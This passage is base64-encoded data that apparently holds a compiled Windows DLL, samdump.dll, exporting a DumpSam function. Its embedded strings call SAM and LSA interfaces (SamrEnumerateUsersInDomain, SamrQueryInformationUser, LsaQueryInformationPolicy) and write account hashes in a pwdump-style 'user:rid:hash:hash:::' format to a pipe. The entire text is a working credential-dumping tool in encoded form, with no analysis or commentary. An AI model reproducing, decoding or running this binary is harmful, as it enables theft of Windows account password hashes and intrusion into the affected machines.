+AHUT9sECdA5Q6AH///+D+P9ZdQIL+KFIhQAQ/zSwVujY5f//WVlGOzVglQAQfIxqAugO6f//g3wk +FAFZi8N0AovHX15bw2oC6LPM//9Zw8zMzMzMzMzMzMyLVCQMi0wkBIXSdEczwIpEJAhXi/mD+gRy +LffZg+EDdAgr0YgHR0l1+ovIweAIA8GLyMHgEAPBi8qD4gPB6QJ0BvOrhdJ0BogHR0p1+otEJAhf +w4tEJATDoayBABCFwHQP/3QkBP/QhcBZdARqAVjDM8DDVYvsav9oqGQAEGicGAAQZKEAAAAAUGSJ +JQAAAACD7BxTVleJZegz/zk9tIEAEHVGV1dqAVtTaKBkABC+AAEAAFZX/xXcYAAQhcB0CIkdtIEA +EOsiV1dTaJxkABBWV/8V2GAAEIXAD4QiAQAAxwW0gQAQAgAAADl9FH4Q/3UU/3UQ6J4BAABZWYlF +FKG0gQAQg/gCdR3/dRz/dRj/dRT/dRD/dQz/dQj/FdhgABDp3gAAAIP4AQ+F0wAAADl9IHUIoaSB +ABCJRSBXV/91FP91EItFJPfYG8CD4AhAUP91IP8V1GAAEIvYiV3kO98PhJwAAACJffyNBBuDwAMk +/Og7CAAAiWXoi8SJRdyDTfz/6xNqAVjDi2XoM/+JfdyDTfz/i13kOX3cdGZT/3Xc/3UU/3UQagH/ +dSD/FdRgABCFwHRNV1dT/3Xc/3UM/3UI/xXcYAAQi/CJddg793Qy9kUNBHRAOX0cD4SyAAAAO3Uc +fx7/dRz/dRhT/3Xc/3UM/3UI/xXcYAAQhcAPhY8AAAAzwI1lyItN8GSJDQAAAABfXlvJw8dF/AEA +AACNBDaDwAMk/OiHBwAAiWXoi9yJXeCDTfz/6xJqAVjDi2XoM/8z24NN/P+Lddg733S0VlP/deT/ +ddz/dQz/dQj/FdxgABCFwHScOX0cV1d1BFdX6wb/dRz/dRhWU2ggAgAA/3Ug/xUcYAAQi/A79w+E +cf///4vG6Wz///+LVCQIi0QkBIXSVo1K/3QNgDgAdAhAi/FJhfZ184A4AF51BStEJATDi8LDVYvs +av9owGQAEGicGAAQZKEAAAAAUGSJJQAAAACD7BhTVleJZeihuIEAEDPbO8N1Po1F5FBqAV5WaKBk +ABBW/xXkYAAQhcB0BIvG6x2NReRQVmicZAAQVlP/FeBgABCFwA+EzgAAAGoCWKO4gQAQg/gCdSSL +RRw7w3UFoZSBABD/dRT/dRD/dQz/dQhQ/xXgYAAQ6Z8AAACD+AEPhZQAAAA5XRh1CKGkgQAQiUUY +U1P/dRD/dQyLRSD32BvAg+AIQFD/dRj/FdRgABCJReA7w3RjiV38jTwAi8eDwAMk/OgKBgAAiWXo +i/SJddxXU1boSvz//4PEDOsLagFYw4tl6DPbM/aDTfz/O/N0Kf914Fb/dRD/dQxqAf91GP8V1GAA +EDvDdBD/dRRQVv91CP8V5GAAEOsCM8CNZcyLTfBkiQ0AAAAAX15bycPMzMzMzFWL7FdWi3UMi00Q +i30Ii8GL0QPGO/52CDv4D4J4AQAA98cDAAAAdRTB6QKD4gOD+QhyKfOl/ySV2FMAEIvHugMAAACD +6QRyDIPgAwPI/ySF8FIAEP8kjehTABCQ/ySNbFMAEJAAUwAQLFMAEFBTABAj0YoGiAeKRgGIRwGK +RgLB6QKIRwKDxgODxwOD+QhyzPOl/ySV2FMAEI1JACPRigaIB4pGAcHpAohHAYPGAoPHAoP5CHKm +86X/JJXYUwAQkCPRigaIB0bB6QJHg/kIcozzpf8kldhTABCNSQDPUwAQvFMAELRTABCsUwAQpFMA +EJxTABCUUwAQjFMAEItEjuSJRI/ki0SO6IlEj+iLRI7siUSP7ItEjvCJRI/wi0SO9IlEj/SLRI74 +iUSP+ItEjvyJRI/8jQSNAAAAAAPwA/j/JJXYUwAQi//oUwAQ8FMAEPxTABAQVAAQi0UIXl/Jw5CK +BogHi0UIXl/Jw5CKBogHikYBiEcBi0UIXl/Jw41JAIoGiAeKRgGIRwGKRgKIRwKLRQheX8nDkI10 +MfyNfDn898cDAAAAdSTB6QKD4gOD+QhyDf3zpfz/JJVwVQAQi//32f8kjSBVABCNSQCLx7oDAAAA +g/kEcgyD4AMryP8khXhUABD/JI1wVQAQkIhUABCoVAAQ0FQAEIpGAyPRiEcDTsHpAk+D+Qhytv3z +pfz/JJVwVQAQjUkAikYDI9GIRwOKRgLB6QKIRwKD7gKD7wKD+QhyjP3zpfz/JJVwVQAQkIpGAyPR +iEcDikYCiEcCikYBwekCiEcBg+4Dg+8Dg/kID4Ja/////fOl/P8klXBVABCNSQAkVQAQLFUAEDRV +ABA8VQAQRFUAEExVABBUVQAQZ1UAEItEjhyJRI8ci0SOGIlEjxiLRI4UiUSPFItEjhCJRI8Qi0SO +DIlEjwyLRI4IiUSPCItEjgSJRI8EjQSNAAAAAAPwA/j/JJVwVQAQi/+AVQAQiFUAEJhVABCsVQAQ +i0UIXl/Jw5CKRgOIRwOLRQheX8nDjUkAikYDiEcDikYCiEcCi0UIXl/Jw5CKRgOIRwOKRgKIRwKK +RgGIRwGLRQheX8nDVot0JAhXg8//9kYMQHQGg2YMAOsXVujC3f//VugQAAAAVov46Abe//+DxAyL +x19ew1aLdCQIV4PP//ZGDIN0NFboWff//1aL+OgsAwAA/3YQ6EQCAACDxAyFwH0Fg8//6xKLRhyF +wHQLUOjZ4f//g2YcAFmDZgwAi8dfXsNTi1wkCDsdgJYAEFZXc3KLw8H4BY08hYCVABCLw4PgH400 +wIsHweYC9kQwBAF0UlPovfX//4sHWfZEMAQBdClT6Gv1//9ZUP8VMGAAEIXAdQr/FRhgABCL8OsC +M/aF9nQV6ML0//+JMOiy9P//xwAJAAAAg87/U+jV9f//WYvG6w7omfT//8cACQAAAIPI/19eW8PM +zMzMzMzMzMzMzItUJASLTCQI98IDAAAAdTyLAjoBdS4KwHQmOmEBdSUK5HQdwegQOkECdRkKwHQR +OmEDdRCDwQSDwgQK5HXSi/8zwMOQG8DR4EDDi//3wgEAAAB0FIoCQjoBdelBCsB04PfCAgAAAHSo +ZosCg8ICOgF10grAdMo6YQF1yQrkdMGDwQLrjMzMzMzMzMzMzMzMzFWL7FYzwFBQUFBQUFBQi1UM +jUkAigIKwHQHQg+rBCTr84t1CIPJ/5BBigYKwHQHRg+jBCRz8ovBg8QgXsnDzMxVi+xXVlOLTRDj +JovZi30Ii/czwPKu99kDy4v+i3UM86aKRv8zyTpH/3cEdARJSffRi8FbXl/Jw8zMzMzMzMzMVYvs +VjPAUFBQUFBQUFCLVQyNSQCKAgrAdAdCD6sEJOvzi3UIigYKwHQKRg+jBCRz841G/4PEIF7Jw8zM +zMzMzFE9ABAAAI1MJAhyFIHpABAAAC0AEAAAhQE9ABAAAHPsK8iLxIUBi+GLCItABFDDVot0JAg7 +NYCWABBzOIvOi8bB+QWD4B+LDI2AlQAQjQTA9kSBBAF0HVdW6Kbz//9W6CgAAABWi/jo9/P//4PE +DIvHX17D6Ljy///HAAkAAADotvL//4MgAIPI/17DVot0JAhXVugq8///g/j/WXQ8g/4BdAWD/gJ1 +FmoC6BPz//9qAYv46Arz//9ZO8dZdBxW6P7y//9ZUP8VLGAAEIXAdQr/FRhgABCL+OsCM/9W6GHy +//+LxoPmH8H4BVmLBIWAlQAQjQz2gGSIBACF/3QMV+i68f//WYPI/+sCM8BfXsNWi3QkCItGDKiD +dB2oCHQZ/3YI6Lbe//9mgWYM9/szwFmJBolGCIlGBF7DzMzMzMzMVYvsV1ZTi3UMi30IjQWMgQAQ +g3gIAHU7sP+L/wrAdC6KBkaKJ0c4xHTyLEE8GhrJgOEgAsEEQYbgLEE8GhrJgOEgAsEEQTjgdNIa +wBz/D77A63jw/wX8ggAQgz34ggAQAH8EagDrFfD/DfyCABBqE+gl3f//xwQkAQAAALj/AAAAM9uQ +CsB0J4oGRoofRzjYdPJQU+itAQAAi9iDxAToowEAAIPEBDjDdNobwIPY/4vYWAvAdQnw/w38ggAQ +6wpqE+g13f//g8QEi8NbXl/Jw1WL7FdWU4tNEAvJD4TpAAAAi3UIi30MjQWMgQAQg3gIAHVOt0Gz +WrYgjUkAiiYK5IoHdCEKwHQdRkc4/HIGONx3AgLmOPhyBjjYdwICxjjEdQ1JddczyTjED4SbAAAA +uf////8PgpAAAAD32emJAAAA8P8F/IIAEIM9+IIAEAB/BGoA6xnw/w38ggAQi9lqE+g13P//xwQk +AQAAAIvLM8Az24v/igYLwIofdCML23QfRkdRUFPovAAAAIvYg8QE6LIAAACDxARZO8N1CUl11TPJ +O8N0Cbn/////cgL32VgLwHUJ8P8N/IIAEOsOi9lqE+g23P//g8QEi8uLwVteX8nDVYvsUYtFCI1I +AYH5AAEAAHcMiw1YdgAQD7cEQetSi8hWizVYdgAQwfkID7bR9kRWAYBedA6AZf4AiE38iEX9agLr +CYBl/QCIRfxqAViNTQpqAWoAagBRUI1F/FBqAeie9f//g8QchcB1AsnDD7dFCiNFDMnDVYvsUYM9 +lIEAEABTVld1HYtFCIP4QQ+MqgAAAIP4Wg+PoQAAAIPAIOmZAAAAi10IvwABAABqATvfXn0lOTVE +fQAQfgtWU+hA////WVnrCqFYdgAQigRYI8aFwHUEi8PrZYsVWHYAEIvDwfgID7bI9kRKAYB0D4Bl +CgBqAohFCIhdCVjrCYBlCQCIXQiLxlZqAI1N/GoDUVCNRQhQV/81lIEAEOiV8v//g8QghcB0rjvG +dQYPtkX86w0PtkX9D7ZN/MHgCAvBX15bycPMzMzMzMzMzMzMzMzMzMyLRCQIi0wkEAvIi0wkDHUJ +i0QkBPfhwhAAU/fhi9iLRCQI92QkFAPYi0QkCPfhA9NbwhAAzMzMzMzMzMzMzMzMjUL/W8ONpCQA +AAAAjWQkADPAikQkCFOL2MHgCItUJAj3wgMAAAB0E4oKQjjZdNGEyXRR98IDAAAAde0L2FeLw8Hj +EFYL2IsKv//+/n6LwYv3M8sD8AP5g/H/g/D/M88zxoPCBIHhAAEBgXUcJQABAYF00yUAAQEBdQiB +5gAAAIB1xF5fWzPAw4tC/DjYdDaEwHTvONx0J4TkdOfB6BA42HQVhMB03DjcdAaE5HTU65ZeX41C +/1vDjUL+Xl9bw41C/V5fW8ONQvxeX1vD/ymgAABpoAAAOaAAAAAAAAKxnAABqZwAAkGcAANxnAADyZwAAoGcAAHpnAAC6ZwAA +yGcAAMppAABUaAAAYGgAAHJoAACAaAAAjmgAAKJoAAC2aAAAzGgAANpoAADmaAAA8GgAAABpAAAO +aQAAIGkAADBpAAA+aQAAUGkAAGhpAAB+aQAAmGkAALJpAABYZwAA5GkAAPJpAAAAagAADmoAABpq +AAAsagAARGoAAFxqAAB0agAAjGoAAKhqAAC0agAAwGoAAMpqAADWagAA5moAAPRqAAAEawAAGmsA +ACprAAA6awAATGsAAAAAAAAAAAAA/////84SABDUEgAQBgAABgABAAAQAAMGAAYCEARFRUUFBQUF +BTUwAFAAAAAAICg4UFgHCAA3MDBXUAcAACAgCAAAAAAIYGhgYGBgAABwcHh4eHgIBwgAAAcACAgI +AAAIAAgABwgAAAAoAG4AdQBsAGwAKQAAAAAAKG51bGwpAABydW50aW1lIGVycm9yIAAADQoAAFRM +T1NTIGVycm9yDQoAAABTSU5HIGVycm9yDQoAAAAARE9NQUlOIGVycm9yDQoAAFI2MDI4DQotIHVu +YWJsZSB0byBpbml0aWFsaXplIGhlYXANCgAAAABSNjAyNw0KLSBub3QgZW5vdWdoIHNwYWNlIGZv +ciBsb3dpbyBpbml0aWFsaXphdGlvbg0KAAAAAFI2MDI2DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9y +IHN0ZGlvIGluaXRpYWxpemF0aW9uDQoAAAAAUjYwMjUNCi0gcHVyZSB2aXJ0dWFsIGZ1bmN0aW9u +IGNhbGwNCgAAAFI2MDI0DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9yIF9vbmV4aXQvYXRleGl0IHRh +YmxlDQoAAAAAUjYwMTkNCi0gdW5hYmxlIHRvIG9wZW4gY29uc29sZSBkZXZpY2UNCgAAAABSNjAx +OA0KLSB1bmV4cGVjdGVkIGhlYXAgZXJyb3INCgAAAABSNjAxNw0KLSB1bmV4cGVjdGVkIG11bHRp +dGhyZWFkIGxvY2sgZXJyb3INCgAAAABSNjAxNg0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciB0aHJl +YWQgZGF0YQ0KAA0KYWJub3JtYWwgcHJvZ3JhbSB0ZXJtaW5hdGlvbg0KAAAAAFI2MDA5DQotIG5v +dCBlbm91Z2ggc3BhY2UgZm9yIGVudmlyb25tZW50DQoAUjYwMDgNCi0gbm90IGVub3VnaCBzcGFj +ZSBmb3IgYXJndW1lbnRzDQoAAABSNjAwMg0KLSBmbG9hdGluZyBwb2ludCBub3QgbG9hZGVkDQoA +AAAATWljcm9zb2Z0IFZpc3VhbCBDKysgUnVudGltZSBMaWJyYXJ5AAAAAAoKAABSdW50aW1lIEVy +cm9yIQoKUHJvZ3JhbTogAAAALi4uADxwcm9ncmFtIG5hbWUgdW5rbm93bj4AAEdldExhc3RBY3Rp +dmVQb3B1cAAAR2V0QWN0aXZlV2luZG93AE1lc3NhZ2VCb3hBAHVzZXIzMi5kbGwAAAAAAAAAAAAA +AAAAAP////8DUAAQB1AAEP////+3UAAQu1AAEP////87UgAQP1IAEEg6bW06c3MAZGRkZCwgTU1N +TSBkZCwgeXl5eQBNL2QveXkAAFBNAABBTQAARGVjZW1iZXIAAAAATm92ZW1iZXIAAAAAT2N0b2Jl +cgBTZXB0ZW1iZXIAAABBdWd1c3QAAEp1bHkAAAAASnVuZQAAAABBcHJpbAAAAE1hcmNoAAAARmVi +cnVhcnkAAAAASmFudWFyeQBEZWMATm92AE9jdABTZXAAQXVnAEp1bABKdW4ATWF5AEFwcgBNYXIA +RmViAEphbgBTYXR1cmRheQAAAABGcmlkYXkAAFRodXJzZGF5AAAAAFdlZG5lc2RheQAAAFR1ZXNk +YXkATW9uZGF5AABTdW5kYXkAAFNhdABGcmkAVGh1AFdlZABUdWUATW9uAFN1bgBTdW5Nb25UdWVX +ZWRUaHVGcmlTYXQAAABKYW5GZWJNYXJBcHJNYXlKdW5KdWxBdWdTZXBPY3ROb3ZEZWMAAAAAfGYA +AAAAAAAAAAAAAGgAABBgAABsZgAAAAAAAAAAAABGaAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +NmgAABpoAAAOaAAAAAAAAKxnAABqZwAAkGcAANxnAADyZwAAoGcAAHpnAAC6ZwAAyGcAAMppAABU +aAAAYGgAAHJoAACAaAAAjmgAAKJoAAC2aAAAzGgAANpoAADmaAAA8GgAAABpAAAOaQAAIGkAADBp +AAA+aQAAUGkAAGhpAAB+aQAAmGkAALJpAABYZwAA5GkAAPJpAAAAagAADmoAABpqAAAsagAARGoA +AFxqAAB0agAAjGoAAKhqAAC0agAAwGoAAMpqAADWagAA5moAAPRqAAAEawAAGmsAACprAAA6awAA +TGsAAAAAAABTAUdldFByb2NBZGRyZXNzAADfAUxvYWRMaWJyYXJ5QQAAGAJPdXRwdXREZWJ1Z1N0 +cmluZ0EAAC0BR2V0TGFzdEVycm9yAAAOA1dyaXRlRmlsZQDDAEZyZWVMaWJyYXJ5AB4AQ2xvc2VI +YW5kbGUAuQBGbHVzaEZpbGVCdWZmZXJzAAABA1dpZGVDaGFyVG9NdWx0aUJ5dGUANwBDcmVhdGVG +aWxlQQBLRVJORUwzMi5kbGwAAB8BTHNhQ2xvc2UAAEEBTHNhUXVlcnlJbmZvcm1hdGlvblBvbGlj +eQA7AUxzYU9wZW5Qb2xpY3kAQURWQVBJMzIuZGxsAABXAlJ0bFVud2luZADaAEdldENvbW1hbmRM +aW5lQQCOAUdldFZlcnNpb24AAIwARXhpdFByb2Nlc3MAywJUZXJtaW5hdGVQcm9jZXNzAAAJAUdl +dEN1cnJlbnRQcm9jZXNzAAwBR2V0Q3VycmVudFRocmVhZElkAADTAlRsc1NldFZhbHVlANACVGxz +QWxsb2MAANECVGxzRnJlZQCcAlNldExhc3RFcnJvcgAA0gJUbHNHZXRWYWx1ZQCYAlNldEhhbmRs +ZUNvdW50AABoAUdldFN0ZEhhbmRsZQAAKAFHZXRGaWxlVHlwZQBmAUdldFN0YXJ0dXBJbmZvQQBa +AERlbGV0ZUNyaXRpY2FsU2VjdGlvbgA4AUdldE1vZHVsZUZpbGVOYW1lQQAAwQBGcmVlRW52aXJv +bm1lbnRTdHJpbmdzQQDCAEZyZWVFbnZpcm9ubWVudFN0cmluZ3NXABkBR2V0RW52aXJvbm1lbnRT +dHJpbmdzABsBR2V0RW52aXJvbm1lbnRTdHJpbmdzVwAAuAFIZWFwRGVzdHJveQC2AUhlYXBDcmVh +dGUAAPECVmlydHVhbEZyZWUAugFIZWFwRnJlZQAAlQJTZXRGaWxlUG9pbnRlcgAAbwBFbnRlckNy +aXRpY2FsU2VjdGlvbgAA3gFMZWF2ZUNyaXRpY2FsU2VjdGlvbgAAyAFJbnRlcmxvY2tlZERlY3Jl +bWVudAAAywFJbnRlcmxvY2tlZEluY3JlbWVudAAAxQFJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9u +ALQBSGVhcEFsbG9jAM8AR2V0Q1BJbmZvAMkAR2V0QUNQAABGAUdldE9FTUNQAADuAlZpcnR1YWxB +bGxvYwAAvQFIZWFwUmVBbGxvYwCoAlNldFN0ZEhhbmRsZQAAAgJNdWx0aUJ5dGVUb1dpZGVDaGFy +ANwBTENNYXBTdHJpbmdBAADdAUxDTWFwU3RyaW5nVwAAaQFHZXRTdHJpbmdUeXBlQQAAbAFHZXRT +dHJpbmdUeXBlVwAAAAAAAAAAE/jgOAAAAACSawAAAQAAAAEAAAABAAAAiGsAAIxrAACQawAA8BIA +AJ5rAAAAAHNhbWR1bXAuZGxsAER1bXBTYW0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAOYyABC4PQAQAAAAAAAAAACOMwAQAAAAAAAAAAAAAAAAAAAAAFNhbXJDbG9z +ZUhhbmRsZQBTYW1JRnJlZV9TQU1QUl9FTlVNRVJBVElPTl9CVUZGRVIAAABTYW1JRnJlZV9TQU1Q +Ul9VU0VSX0lORk9fQlVGRkVSAFNhbXJFbnVtZXJhdGVVc2Vyc0luRG9tYWluAABTYW1yUXVlcnlJ +bmZvcm1hdGlvblVzZXIAAAAAU2Ftck9wZW5Vc2VyAAAAAFNhbXJPcGVuRG9tYWluAABTYW1JQ29u +bmVjdABzYW1zcnYuZGxsAABXcml0ZUZpbGUgZmFpbGVkOiAlZApUZXh0OiAlcwAAACVzOiVkOiUw +MnglMDJ4JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAy +eCUwMng6JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAy +eCUwMnglMDJ4JTAyeDo6OgoAU2FtclF1ZXJ5SW5mb3JtYXRpb25Vc2VyIGZhaWxlZCA6IDB4JTA4 +WAoAAABTYW1yT3BlblVzZXIoMHgleCkgZmFpbGVkIDogMHglMDhYCgBTYW1yRW51bWVyYXRlVXNl +cnNJbkRvbWFpbiBmYWlsZWQgOiAweCUwOFgKAFNhbU9wZW5Eb21haW4gZmFpbGVkIDogMHglMDhY +CgAAU2FtQ29ubmVjdCBmYWlsZWQgOiAweCUwOFgAAExzYVF1ZXJ5SW5mb3JtYXRpb25Qb2xpY3kg +ZmFpbGVkIDogMHglMDhYAAAATHNhT3BlblBvbGljeSBmYWlsZWQgOiAweCUwOFgAAABGYWlsZWQg +dG8gbG9hZCBmdW5jdGlvbnMKAAAARmFpbGVkIHRvIG9wZW4gb3V0cHV0IHBpcGUoJXMpOiAlZAoA +IAWTGQAAAAAAAAAAAAAAAKkkABBoYQAQWGEAEP////8AAAAA/////wAKAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAEAAAAAIAAADUYwAQCAAAAKhjABAJAAAAfGMAEAoAAABYYwAQEAAAACxj +ABARAAAA/GIAEBIAAADYYgAQEwAAAKxiABAYAAAAdGIAEBkAAABMYgAQGgAAABRiABAbAAAA3GEA +EBwAAAC0YQAQeAAAAKRhABB5AAAAlGEAEHoAAACEYQAQ/AAAAIBhABD/AAAAcGEAEGCFABAAAAAA +YIUAEAEBAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAEAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAACAAAAAgtTgAQbU4AEG1OABBtTgAQbU4AEG1OABBidgAQYnYAEAAAIAAgACAAIAAgACAAIAAgACAA +KAAoACgAKAAoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEgAEAAQABAAEAAQ +ABAAEAAQABAAEAAQABAAEAAQABAAhACEAIQAhACEAIQAhACEAIQAhAAQABAAEAAQABAAEAAQAIEA +gQCBAIEAgQCBAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAQABAAEAAQ +ABAAEACCAIIAggCCAIIAggACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIA +EAAQABAAEAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ +gQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAECBABAAAAAAAAAAAAAAAABYgQAQAAAAAAAA +AAAAAAAAKIEAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAUAAMALAAAAAAAAAB0AAMAEAAAAAAAAAJYAAMAEAAAAAAAAAI0AAMAI +AAAAAAAAAI4AAMAIAAAAAAAAAI8AAMAIAAAAAAAAAJAAAMAIAAAAAAAAAJEAAMAIAAAAAAAAAJIA +AMAIAAAAAAAAAJMAAMAIAAAAAAAAAAMAAAAHAAAAeAAAAAoAAAAAAAAAAAAAAAECBAgAAAAApAMA +AGCCeYIhAAAAAAAAAKbfAAAAAAAAoaUAAAAAAACBn+D8AAAAAEB+gPwAAAAAqAMAAMGj2qMgAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAACB/gAAAAAAAED+AAAAAAAAtQMAAMGj2qMgAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAACB/gAAAAAAAEH+AAAAAAAAtgMAAM+i5KIaAOWi6KJbAAAAAAAAAAAAAAAAAAAA +AACB/gAAAAAAAEB+of4AAAAAUQUAAFHaXtogAF/aatoyAAAAAAAAAAAAAAAAAAAAAACB09je4PkA +ADF+gf4AAAAAAAAAAAAAAAD4AwAAAAAAAAAAAAAAAAAAAQAAABYAAAACAAAAAgAAAAMAAAACAAAA +BAAAABgAAAAFAAAADQAAAAYAAAAJAAAABwAAAAwAAAAIAAAADAAAAAkAAAAMAAAACgAAAAcAAAAL +AAAACAAAAAwAAAAWAAAADQAAABYAAAAPAAAAAgAAABAAAAANAAAAEQAAABIAAAASAAAAAgAAACEA +AAANAAAANQAAAAIAAABBAAAADQAAAEMAAAACAAAAUAAAABEAAABSAAAADQAAAFMAAAANAAAAVwAA +ABYAAABZAAAACwAAAGwAAAANAAAAbQAAACAAAABwAAAAHAAAAHIAAAAJAAAABgAAABYAAACAAAAA +CgAAAIEAAAAKAAAAggAAAAkAAACDAAAAFgAAAIQAAAANAAAAkQAAACkAAACeAAAADQAAAKEAAAAC +AAAApAAAAAsAAACnAAAADQAAALcAAAARAAAAzgAAAAIAAADXAAAACwAAABgHAAAMAAAAQwAAAEMA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAEMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAuAAAAAQAAAFh9ABAAAAAA7GUA +EOhlABDkZQAQ4GUAENxlABDYZQAQ1GUAEMxlABDEZQAQvGUAELBlABCkZQAQnGUAEJBlABCMZQAQ +iGUAEIRlABCAZQAQfGUAEHhlABB0ZQAQcGUAEGxlABBoZQAQZGUAEGBlABBYZQAQTGUAEERlABA8 +ZQAQfGUAEDRlABAsZQAQJGUAEBhlABAQZQAQBGUAEPhkABD0ZAAQ8GQAEOhkABDUZAAQzGQAEAAA +AAAuAAAAAAAAAAh+ABAoggAQKIIAECiCABAoggAQKIIAECiCABAoggAQKIIAECiCABB/f39/f39/ +fxB+ABAAAAAAAAAAAAAAAACAcAAAAQAAAPDx//9QU1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUERUAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFx+ABCcfgAQAAAAAP// +//8AAAAAAAAAAAAAAAD/////AAAAAAAAAAAAAAAAAAAAAAAAAAD/////HgAAADsAAABaAAAAeAAA +AJcAAAC1AAAA1AAAAPMAAAARAQAAMAEAAE4BAABtAQAA/////x4AAAA6AAAAWQAAAHcAAACWAAAA +tAAAANMAAADyAAAAEAEAAC8BAABNAQAAbAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 